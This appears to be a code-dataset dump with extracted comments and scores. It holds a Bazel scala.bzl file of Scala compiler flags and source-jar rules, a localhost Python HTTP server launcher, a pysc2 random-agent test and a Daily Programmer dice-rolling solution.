"-P:wartremover:traverser:org.wartremover.warts.NonUnitStatements", # "-P:wartremover:traverser:org.wartremover.warts.Nothing", # "-P:wartremover:traverser:org.wartremover.warts.Null", "-P:wartremover:traverser:org.wartremover.warts.Option2Iterable", # "-P:wartremover:traverser:org.wartremover.warts.OptionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Overloading", "-P:wartremover:traverser:org.wartremover.warts.Product", # "-P:wartremover:traverser:org.wartremover.warts.PublicInference", # "-P:wartremover:traverser:org.wartremover.warts.Recursion", "-P:wartremover:traverser:org.wartremover.warts.Return", "-P:wartremover:traverser:org.wartremover.warts.Serializable", "-P:wartremover:traverser:org.wartremover.warts.StringPlusAny", # "-P:wartremover:traverser:org.wartremover.warts.Throw", # "-P:wartremover:traverser:org.wartremover.warts.ToString", # "-P:wartremover:traverser:org.wartremover.warts.TraversableOps", # "-P:wartremover:traverser:org.wartremover.warts.TryPartial", # "-P:wartremover:traverser:org.wartremover.warts.Var", # "-P:wartremover:traverser:org.wartremover.warts.While", ] # delete items from lf_scalacopts as they are restored to common_scalacopts and plugin_scalacopts # # calculate items to delete # $ python # ... copypaste ... # >>> filter(set(common_scalacopts + plugin_scalacopts).__contains__, lf_scalacopts) # [] # ^ means nothing to remove lf_scalacopts = [ "-Ywarn-unused", ] def _wrap_rule(rule, name = "", scalacopts = [], plugins = [], **kwargs): rule( name = name, scalacopts = common_scalacopts + plugin_scalacopts + scalacopts, plugins = common_plugins + plugins, **kwargs ) def _wrap_rule_no_plugins(rule, scalacopts = [], **kwargs): rule( scalacopts = common_scalacopts + scalacopts, **kwargs ) def _strip_path_upto(path, upto): idx = path.find(upto) if idx >= 0: return [path[idx + len(upto):].strip("/")] else: return [] def _scala_source_jar_impl(ctx): zipper_args = [ "%s=%s" % (new_path, src.path) for src in ctx.files.srcs for new_path in _strip_path_upto(src.path, ctx.attr.strip_upto) ] zipper_args_file = ctx.actions.declare_file( ctx.label.name + ".zipper_args", ) manifest_file = ctx.actions.declare_file( ctx.label.name + "_MANIFEST.MF", sibling = zipper_args_file, ) ctx.actions.write(manifest_file, "Manifest-Version: 1.0\n") zipper_args += ["META-INF/MANIFEST.MF=" + manifest_file.path + "\n"] ctx.actions.write(zipper_args_file, "\n".join(zipper_args)) ctx.actions.run( executable = ctx.executable._zipper, inputs = ctx.files.srcs + [manifest_file, zipper_args_file], outputs = [ctx.outputs.out], arguments = ["c", ctx.outputs.out.path, "@" + zipper_args_file.path], mnemonic = "ScalaSourceJar", ) scala_source_jar = rule( implementation = _scala_source_jar_impl, attrs = { "srcs": attr.label_list(allow_files = True), # The string to strip up to from source file paths. # E.g. "main/scala" strips "foo/src/main/scala/com/daml/Foo.scala" # to "com/daml/Foo.scala". # Files not matching are not included in the source jar, # so you may end up with empty source jars. # TODO(JM): Add support for multiple options. "strip_upto": attr.string(default = "main/scala"), "_zipper": attr.label( default = Label("@bazel_tools//tools/zip:zipper"), cfg = "host", executable = True, allow_files = True, ), }, outputs = { "out": "%{name}.jar", }, ) def _create_scala_source_jar(**kwargs): # Try to not create empty source jars. We may still end up # with them if the "strip_upto" does not match any of the # paths. if len(kwargs["srcs"]) > 0: scala_source_jar( name = kwargs["name"] + "_src", srcs = kwargs["srcs"], ) def da_scala_library(name, **kwargs): """ Define a Scala library. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_library, name, **kwargs) _create_scala_source_jar(**(kwargs + {"name": name})) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_macro_library(**kwargs): """ Define a Scala library that contains macros. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_macro_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_macro_library, **kwargs) _create_scala_source_jar(**kwargs) def da_scala_binary(name, **kwargs): """ Define a Scala executable. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_binary` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_binary """ _wrap_rule(scala_binary, name, **kwargs) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_test(**kwargs): """ Define a Scala executable that runs the unit tests in the given source files. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test """ _wrap_rule(scala_test, **kwargs) def da_scala_test_suite(**kwargs): """ Define a Scala test executable for each source file and bundle them into one target. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test_suite` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test_suite """ _wrap_rule(scala_test_suite, use_short_names = is_windows, **kwargs) # TODO make the jmh rule work with plugins -- probably # just a matter of passing the flag in def da_scala_benchmark_jmh(**kwargs): _wrap_rule_no_plugins(scala_benchmark_jmh, **kwargs)
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 load( "@io_bazel_rules_scala//scala:scala.bzl", "scala_binary", "scala_library", "scala_macro_library", "scala_test", "scala_test_suite", ) load( "@io_bazel_rules_scala//jmh:jmh.bzl", "scala_benchmark_jmh", ) load("//bazel_tools:pom_file.bzl", "pom_file") load("@os_info//:os_info.bzl", "is_windows") # This file defines common Scala compiler flags and plugins used throughout # this repository. The initial set of flags is taken from the ledger-client # project. If you find that additional flags are required for another project, # consider whether all projects could benefit from these changes. If so, add # them here. # # Use the macros `da_scala_*` defined in this file, instead of the stock rules # `scala_*` from `rules_scala` in order for these default flags to take effect. common_scalacopts = [ # doesn't allow advance features of the language without explict import # (higherkinds, implicits) "-feature", "-target:jvm-1.8", "-encoding", "UTF-8", # more detailed information about type-erasure related warnings "-unchecked", # warn if using deprecated stuff "-deprecation", "-Xfuture", # better error reporting for pureconfig "-Xmacro-settings:materialize-derivations", "-Xfatal-warnings", # adapted args is a deprecated feature: # `def foo(a: (A, B))` can be called with `foo(a, b)`. # properly it should be `foo((a,b))` "-Yno-adapted-args", "-Ywarn-dead-code", # Warn about implicit conversion between numerical types "-Ywarn-numeric-widen", # Gives a warning for functions declared as returning Unit, but the body returns a value "-Ywarn-value-discard", "-Ywarn-unused-import", # unfortunately give false warning for the `(a, b) = someTuple` # line inside a for comprehension # "-Ywarn-unused" ] plugin_deps = [ "//3rdparty/jvm/org/wartremover:wartremover", ] common_plugins = [ "//external:jar/org/wartremover/wartremover_2_12", ] plugin_scalacopts = [ # do not enable wart remover for now, because we need to fix a lot of # test code, which didn't have wart remover enabled before "-Xplugin-require:wartremover", # This lists all wartremover linting passes. # The list of enabled ones is pretty arbitrary, please ping Francesco for # info "-P:wartremover:traverser:org.wartremover.warts.Any", "-P:wartremover:traverser:org.wartremover.warts.AnyVal", "-P:wartremover:traverser:org.wartremover.warts.ArrayEquals", # "-P:wartremover:traverser:org.wartremover.warts.AsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.DefaultArguments", # "-P:wartremover:traverser:org.wartremover.warts.EitherProjectionPartial", "-P:wartremover:traverser:org.wartremover.warts.Enumeration", # "-P:wartremover:traverser:org.wartremover.warts.Equals", "-P:wartremover:traverser:org.wartremover.warts.ExplicitImplicitTypes", # "-P:wartremover:traverser:org.wartremover.warts.FinalCaseClass", # "-P:wartremover:traverser:org.wartremover.warts.FinalVal", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitConversion", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitParameter", # "-P:wartremover:traverser:org.wartremover.warts.IsInstanceOf", "-P:wartremover:traverser:org.wartremover.warts.JavaSerializable", "-P:wartremover:traverser:org.wartremover.warts.LeakingSealed", # "-P:wartremover:traverser:org.wartremover.warts.MutableDataStructures", # "-P:wartremover:traverser:org.wartremover.warts.NonUnitStatements", # "-P:wartremover:traverser:org.wartremover.warts.Nothing", # "-P:wartremover:traverser:org.wartremover.warts.Null", "-P:wartremover:traverser:org.wartremover.warts.Option2Iterable", # "-P:wartremover:traverser:org.wartremover.warts.OptionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Overloading", "-P:wartremover:traverser:org.wartremover.warts.Product", # "-P:wartremover:traverser:org.wartremover.warts.PublicInference", # "-P:wartremover:traverser:org.wartremover.warts.Recursion", "-P:wartremover:traverser:org.wartremover.warts.Return", "-P:wartremover:traverser:org.wartremover.warts.Serializable", "-P:wartremover:traverser:org.wartremover.warts.StringPlusAny", # "-P:wartremover:traverser:org.wartremover.warts.Throw", # "-P:wartremover:traverser:org.wartremover.warts.ToString", # "-P:wartremover:traverser:org.wartremover.warts.TraversableOps", # "-P:wartremover:traverser:org.wartremover.warts.TryPartial", # "-P:wartremover:traverser:org.wartremover.warts.Var", # "-P:wartremover:traverser:org.wartremover.warts.While", ] # delete items from lf_scalacopts as they are restored to common_scalacopts and plugin_scalacopts # # calculate items to delete # $ python # ... copypaste ... # >>> filter(set(common_scalacopts + plugin_scalacopts).__contains__, lf_scalacopts) # [] # ^ means nothing to remove lf_scalacopts = [ "-Ywarn-unused", ] def _wrap_rule(rule, name = "", scalacopts = [], plugins = [], **kwargs): rule( name = name, scalacopts = common_scalacopts + plugin_scalacopts + scalacopts, plugins = common_plugins + plugins, **kwargs ) def _wrap_rule_no_plugins(rule, scalacopts = [], **kwargs): rule( scalacopts = common_scalacopts + scalacopts, **kwargs ) def _strip_path_upto(path, upto): idx = path.find(upto) if idx >= 0: return [path[idx + len(upto):].strip("/")] else: return [] def _scala_source_jar_impl(ctx): zipper_args = [ "%s=%s" % (new_path, src.path) for src in ctx.files.srcs for new_path in _strip_path_upto(src.path, ctx.attr.strip_upto) ] zipper_args_file = ctx.actions.declare_file( ctx.label.name + ".zipper_args", ) manifest_file = ctx.actions.declare_file( ctx.label.name + "_MANIFEST.MF", sibling = zipper_args_file, ) ctx.actions.write(manifest_file, "Manifest-Version: 1.0\n") zipper_args += ["META-INF/MANIFEST.MF=" + manifest_file.path + "\n"] ctx.actions.write(zipper_args_file, "\n".join(zipper_args)) ctx.actions.run( executable = ctx.executable._zipper, inputs = ctx.files.srcs + [manifest_file, zipper_args_file], outputs = [ctx.outputs.out], arguments = ["c", ctx.outputs.out.path, "@" + zipper_args_file.path], mnemonic = "ScalaSourceJar", ) scala_source_jar = rule( implementation = _scala_source_jar_impl, attrs = { "srcs": attr.label_list(allow_files = True), # The string to strip up to from source file paths. # E.g. "main/scala" strips "foo/src/main/scala/com/daml/Foo.scala" # to "com/daml/Foo.scala". # Files not matching are not included in the source jar, # so you may end up with empty source jars. # TODO(JM): Add support for multiple options. "strip_upto": attr.string(default = "main/scala"), "_zipper": attr.label( default = Label("@bazel_tools//tools/zip:zipper"), cfg = "host", executable = True, allow_files = True, ), }, outputs = { "out": "%{name}.jar", }, ) def _create_scala_source_jar(**kwargs): # Try to not create empty source jars. We may still end up # with them if the "strip_upto" does not match any of the # paths. if len(kwargs["srcs"]) > 0: scala_source_jar( name = kwargs["name"] + "_src", srcs = kwargs["srcs"], ) def da_scala_library(name, **kwargs): """ Define a Scala library. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_library, name, **kwargs) _create_scala_source_jar(**(kwargs + {"name": name})) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_macro_library(**kwargs): """ Define a Scala library that contains macros. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_macro_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library """ _wrap_rule(scala_macro_library, **kwargs) _create_scala_source_jar(**kwargs) def da_scala_binary(name, **kwargs): """ Define a Scala executable. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_binary` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_binary """ _wrap_rule(scala_binary, name, **kwargs) if "tags" in kwargs: for tag in kwargs["tags"]: if tag.startswith("maven_coordinates="): pom_file( name = name + "_pom", target = ":" + name, ) break def da_scala_test(**kwargs): """ Define a Scala executable that runs the unit tests in the given source files. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test """ _wrap_rule(scala_test, **kwargs) def da_scala_test_suite(**kwargs): """ Define a Scala test executable for each source file and bundle them into one target. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test_suite` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test_suite """ _wrap_rule(scala_test_suite, use_short_names = is_windows, **kwargs) # TODO make the jmh rule work with plugins -- probably # just a matter of passing the flag in def da_scala_benchmark_jmh(**kwargs): _wrap_rule_no_plugins(scala_benchmark_jmh, **kwargs)
en
0.678589
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved. # SPDX-License-Identifier: Apache-2.0 # This file defines common Scala compiler flags and plugins used throughout # this repository. The initial set of flags is taken from the ledger-client # project. If you find that additional flags are required for another project, # consider whether all projects could benefit from these changes. If so, add # them here. # # Use the macros `da_scala_*` defined in this file, instead of the stock rules # `scala_*` from `rules_scala` in order for these default flags to take effect. # doesn't allow advance features of the language without explict import # (higherkinds, implicits) # more detailed information about type-erasure related warnings # warn if using deprecated stuff # better error reporting for pureconfig # adapted args is a deprecated feature: # `def foo(a: (A, B))` can be called with `foo(a, b)`. # properly it should be `foo((a,b))` # Warn about implicit conversion between numerical types # Gives a warning for functions declared as returning Unit, but the body returns a value # unfortunately give false warning for the `(a, b) = someTuple` # line inside a for comprehension # "-Ywarn-unused" # do not enable wart remover for now, because we need to fix a lot of # test code, which didn't have wart remover enabled before # This lists all wartremover linting passes. # The list of enabled ones is pretty arbitrary, please ping Francesco for # info # "-P:wartremover:traverser:org.wartremover.warts.AsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.DefaultArguments", # "-P:wartremover:traverser:org.wartremover.warts.EitherProjectionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Equals", # "-P:wartremover:traverser:org.wartremover.warts.FinalCaseClass", # "-P:wartremover:traverser:org.wartremover.warts.FinalVal", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitConversion", # "-P:wartremover:traverser:org.wartremover.warts.ImplicitParameter", # "-P:wartremover:traverser:org.wartremover.warts.IsInstanceOf", # "-P:wartremover:traverser:org.wartremover.warts.MutableDataStructures", # "-P:wartremover:traverser:org.wartremover.warts.NonUnitStatements", # "-P:wartremover:traverser:org.wartremover.warts.Nothing", # "-P:wartremover:traverser:org.wartremover.warts.Null", # "-P:wartremover:traverser:org.wartremover.warts.OptionPartial", # "-P:wartremover:traverser:org.wartremover.warts.Overloading", # "-P:wartremover:traverser:org.wartremover.warts.PublicInference", # "-P:wartremover:traverser:org.wartremover.warts.Recursion", # "-P:wartremover:traverser:org.wartremover.warts.Throw", # "-P:wartremover:traverser:org.wartremover.warts.ToString", # "-P:wartremover:traverser:org.wartremover.warts.TraversableOps", # "-P:wartremover:traverser:org.wartremover.warts.TryPartial", # "-P:wartremover:traverser:org.wartremover.warts.Var", # "-P:wartremover:traverser:org.wartremover.warts.While", # delete items from lf_scalacopts as they are restored to common_scalacopts and plugin_scalacopts # # calculate items to delete # $ python # ... copypaste ... # >>> filter(set(common_scalacopts + plugin_scalacopts).__contains__, lf_scalacopts) # [] # ^ means nothing to remove # The string to strip up to from source file paths. # E.g. "main/scala" strips "foo/src/main/scala/com/daml/Foo.scala" # to "com/daml/Foo.scala". # Files not matching are not included in the source jar, # so you may end up with empty source jars. # TODO(JM): Add support for multiple options. # Try to not create empty source jars. We may still end up # with them if the "strip_upto" does not match any of the # paths. Define a Scala library. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library Define a Scala library that contains macros. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_macro_library` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_library Define a Scala executable. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_binary` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_binary Define a Scala executable that runs the unit tests in the given source files. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test Define a Scala test executable for each source file and bundle them into one target. Applies common Scala options defined in `bazel_tools/scala.bzl`. And forwards to `scala_test_suite` from `rules_scala`. Refer to the [`rules_scala` documentation][rules_scala_docs]. [rules_scala_docs]: https://github.com/bazelbuild/rules_scala#scala_test_suite # TODO make the jmh rule work with plugins -- probably # just a matter of passing the flag in
1.52488
2
ResponsiveWebDesign/main.py
Flo-Slv/freeCodeCamp
0
6627924
import time from http.server import HTTPServer from server import Server HOST_NAME = 'localhost' PORT = 8000 if __name__ == "__main__": httpd = HTTPServer((HOST_NAME,PORT),Server) print(time.asctime(), "Start server - %s:%s"%(HOST_NAME,PORT)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print(time.asctime(), "Stop server - %s:%s"%(HOST_NAME,PORT))
import time from http.server import HTTPServer from server import Server HOST_NAME = 'localhost' PORT = 8000 if __name__ == "__main__": httpd = HTTPServer((HOST_NAME,PORT),Server) print(time.asctime(), "Start server - %s:%s"%(HOST_NAME,PORT)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print(time.asctime(), "Stop server - %s:%s"%(HOST_NAME,PORT))
none
1
2.558605
3
pysc2/tests/random_agent_test.py
zeuseyera/pysc2
20
6627925
#!/usr/bin/python # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run a random agent for a few steps.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import absltest from absl.testing import parameterized from pysc2.agents import random_agent from pysc2.env import run_loop from pysc2.env import sc2_env from pysc2.tests import utils class TestRandomAgent(parameterized.TestCase, utils.TestCase): @parameterized.named_parameters( ("features", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64))), ("rgb", sc2_env.AgentInterfaceFormat( rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64))), ("all", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64), rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64), action_space=sc2_env.ActionSpace.FEATURES, use_unit_counts=True, use_feature_units=True)), ) def test_random_agent(self, agent_interface_format): steps = 250 step_mul = 8 with sc2_env.SC2Env( map_name="Simple64", agent_interface_format=agent_interface_format, step_mul=step_mul, game_steps_per_episode=steps * step_mul//2) as env: agent = random_agent.RandomAgent() run_loop.run_loop([agent], env, steps) self.assertEqual(agent.steps, steps) if __name__ == "__main__": absltest.main()
#!/usr/bin/python # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Run a random agent for a few steps.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from absl.testing import absltest from absl.testing import parameterized from pysc2.agents import random_agent from pysc2.env import run_loop from pysc2.env import sc2_env from pysc2.tests import utils class TestRandomAgent(parameterized.TestCase, utils.TestCase): @parameterized.named_parameters( ("features", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64))), ("rgb", sc2_env.AgentInterfaceFormat( rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64))), ("all", sc2_env.AgentInterfaceFormat( feature_dimensions=sc2_env.Dimensions(screen=84, minimap=64), rgb_dimensions=sc2_env.Dimensions(screen=128, minimap=64), action_space=sc2_env.ActionSpace.FEATURES, use_unit_counts=True, use_feature_units=True)), ) def test_random_agent(self, agent_interface_format): steps = 250 step_mul = 8 with sc2_env.SC2Env( map_name="Simple64", agent_interface_format=agent_interface_format, step_mul=step_mul, game_steps_per_episode=steps * step_mul//2) as env: agent = random_agent.RandomAgent() run_loop.run_loop([agent], env, steps) self.assertEqual(agent.steps, steps) if __name__ == "__main__": absltest.main()
en
0.846204
#!/usr/bin/python # Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Run a random agent for a few steps.
2.316403
2
daily_programmer/384.py
davidlowryduda/pythonMiniProjects
0
6627926
<filename>daily_programmer/384.py """ Sample Use ========== echo -e "3d6\n10d13\n2d5" | python3 384.py Description =========== I love playing D&D with my friends, and my favorite part is creating character sheets (my DM is notorious for killing us all off by level 3 or so). One major part of making character sheets is rolling the character's stats. Sadly, I have lost all my dice, so I'm asking for your help to make a dice roller for me to use! Formal Inputs & Outputs ======================= Input description ----------------- Your input will contain one or more lines, where each line will be in the form of "NdM"; for example: 3d6 4d12 1d10 5d4 If you've ever played D&D you probably recognize those, but for the rest of you, this is what those mean: The first number is the number of dice to roll, the d just means "dice", it's just used to split up the two numbers, and the second number is how many sides the dice have. So the above example of "3d6" means "roll 3 6-sided dice". Also, just in case you didn't know, in D&D, not all the dice we roll are the normal cubes. A d6 is a cube, because it's a 6-sided die, but a d20 has twenty sides, so it looks a lot closer to a ball than a cube. The first number, the number of dice to roll, can be any integer between 1 and 100, inclusive. The second number, the number of sides of the dice, can be any integer between 2 and 100, inclusive. Output description ------------------ You should output the sum of all the rolls of that specified die, each on their own line. so if your input is "3d6", the output should look something like 14 Just a single number, you rolled 3 6-sided dice, and they added up to 14. Challenge Input 5d12 6d4 1d2 1d8 3d6 4d20 100d100 Challenge Output [some number between 5 and 60, probably closer to 32 or 33] [some number between 6 and 24, probably around 15] [you get the idea] [...] Notes/Hints =========== A dice roll is basically the same as picking a random number between 1 and 6 (or 12, or 20, or however many sides the die has). You should use some way of randomly selecting a number within a range based off of your input. Many common languages have random number generators available, but at least a few of them will give the same "random" numbers every time you use the program. In my opinion that's not very random. If you run your code 3+ times with the same inputs and it gives the same outputs, that wouldn't be super useful for a game of D&D, would it? If that happens with your code, try to find a way around that. I'm guessing for some of the newer folks, this might be one of the trickier parts to get correct. Don't just multiply your roll by the number of dice, please. I don't know if any of you were thinking about doing that, but I was. The problem is that if you do that, it eliminates a lot of possible values. For example, there's no way to roll 14 from 3d6 if you just roll it once and multiply by 3. Setting up a loop to roll each die is probably your best bet here. Bonus ===== In addition to the sum of all dice rolls for your output, print out the result of each roll on the same line, using a format that looks something like 14: 6 3 5 22: 10 7 1 4 9: 9 11: 3 2 2 1 3 You could also try setting it up so that you can manually input more rolls. that way you can just leave the program open and every time you want to roll more dice, you just type it in and hit enter. """ import random import sys from typing import Tuple, List, Union class Die: def __init__(self, sides : int) -> None: self.sides = sides def __str__(self) -> str: return str(self.sides) def roll(self) -> int: return random.randint(1, self.sides) def parse_dice_string(dice_string : str) -> Tuple[int, int]: """Given nds, interpret this as n `num_dice` with `s` sides.""" num_dice, _, sides = dice_string.partition("d") return (int(num_dice), int(sides)) class DiceBag: def __init__(self, dice_string : str) -> None: self.num_dice, self.sides = parse_dice_string(dice_string) self.dice = [Die(self.sides) for _ in range(self.num_dice)] def roll(self) -> List[int]: self.roll_result = list(map(lambda die: die.roll(), self.dice)) return self.roll_result def sum(self) -> int: return sum(self.roll_result) def print_roll(self, newroll: bool = True): if newroll: self.roll() print(str(self.sum()) + ": " + ' '.join(str(dieroll) for dieroll in self.roll_result)) def parse_input(): input_dice = [DiceBag(input_line) for input_line in sys.stdin.readlines()] if not input_dice: print("No input detected. Terminating.") return list(map(lambda dicebag: dicebag.print_roll(), input_dice)) return if __name__ == "__main__": parse_input()
<filename>daily_programmer/384.py """ Sample Use ========== echo -e "3d6\n10d13\n2d5" | python3 384.py Description =========== I love playing D&D with my friends, and my favorite part is creating character sheets (my DM is notorious for killing us all off by level 3 or so). One major part of making character sheets is rolling the character's stats. Sadly, I have lost all my dice, so I'm asking for your help to make a dice roller for me to use! Formal Inputs & Outputs ======================= Input description ----------------- Your input will contain one or more lines, where each line will be in the form of "NdM"; for example: 3d6 4d12 1d10 5d4 If you've ever played D&D you probably recognize those, but for the rest of you, this is what those mean: The first number is the number of dice to roll, the d just means "dice", it's just used to split up the two numbers, and the second number is how many sides the dice have. So the above example of "3d6" means "roll 3 6-sided dice". Also, just in case you didn't know, in D&D, not all the dice we roll are the normal cubes. A d6 is a cube, because it's a 6-sided die, but a d20 has twenty sides, so it looks a lot closer to a ball than a cube. The first number, the number of dice to roll, can be any integer between 1 and 100, inclusive. The second number, the number of sides of the dice, can be any integer between 2 and 100, inclusive. Output description ------------------ You should output the sum of all the rolls of that specified die, each on their own line. so if your input is "3d6", the output should look something like 14 Just a single number, you rolled 3 6-sided dice, and they added up to 14. Challenge Input 5d12 6d4 1d2 1d8 3d6 4d20 100d100 Challenge Output [some number between 5 and 60, probably closer to 32 or 33] [some number between 6 and 24, probably around 15] [you get the idea] [...] Notes/Hints =========== A dice roll is basically the same as picking a random number between 1 and 6 (or 12, or 20, or however many sides the die has). You should use some way of randomly selecting a number within a range based off of your input. Many common languages have random number generators available, but at least a few of them will give the same "random" numbers every time you use the program. In my opinion that's not very random. If you run your code 3+ times with the same inputs and it gives the same outputs, that wouldn't be super useful for a game of D&D, would it? If that happens with your code, try to find a way around that. I'm guessing for some of the newer folks, this might be one of the trickier parts to get correct. Don't just multiply your roll by the number of dice, please. I don't know if any of you were thinking about doing that, but I was. The problem is that if you do that, it eliminates a lot of possible values. For example, there's no way to roll 14 from 3d6 if you just roll it once and multiply by 3. Setting up a loop to roll each die is probably your best bet here. Bonus ===== In addition to the sum of all dice rolls for your output, print out the result of each roll on the same line, using a format that looks something like 14: 6 3 5 22: 10 7 1 4 9: 9 11: 3 2 2 1 3 You could also try setting it up so that you can manually input more rolls. that way you can just leave the program open and every time you want to roll more dice, you just type it in and hit enter. """ import random import sys from typing import Tuple, List, Union class Die: def __init__(self, sides : int) -> None: self.sides = sides def __str__(self) -> str: return str(self.sides) def roll(self) -> int: return random.randint(1, self.sides) def parse_dice_string(dice_string : str) -> Tuple[int, int]: """Given nds, interpret this as n `num_dice` with `s` sides.""" num_dice, _, sides = dice_string.partition("d") return (int(num_dice), int(sides)) class DiceBag: def __init__(self, dice_string : str) -> None: self.num_dice, self.sides = parse_dice_string(dice_string) self.dice = [Die(self.sides) for _ in range(self.num_dice)] def roll(self) -> List[int]: self.roll_result = list(map(lambda die: die.roll(), self.dice)) return self.roll_result def sum(self) -> int: return sum(self.roll_result) def print_roll(self, newroll: bool = True): if newroll: self.roll() print(str(self.sum()) + ": " + ' '.join(str(dieroll) for dieroll in self.roll_result)) def parse_input(): input_dice = [DiceBag(input_line) for input_line in sys.stdin.readlines()] if not input_dice: print("No input detected. Terminating.") return list(map(lambda dicebag: dicebag.print_roll(), input_dice)) return if __name__ == "__main__": parse_input()
en
0.931697
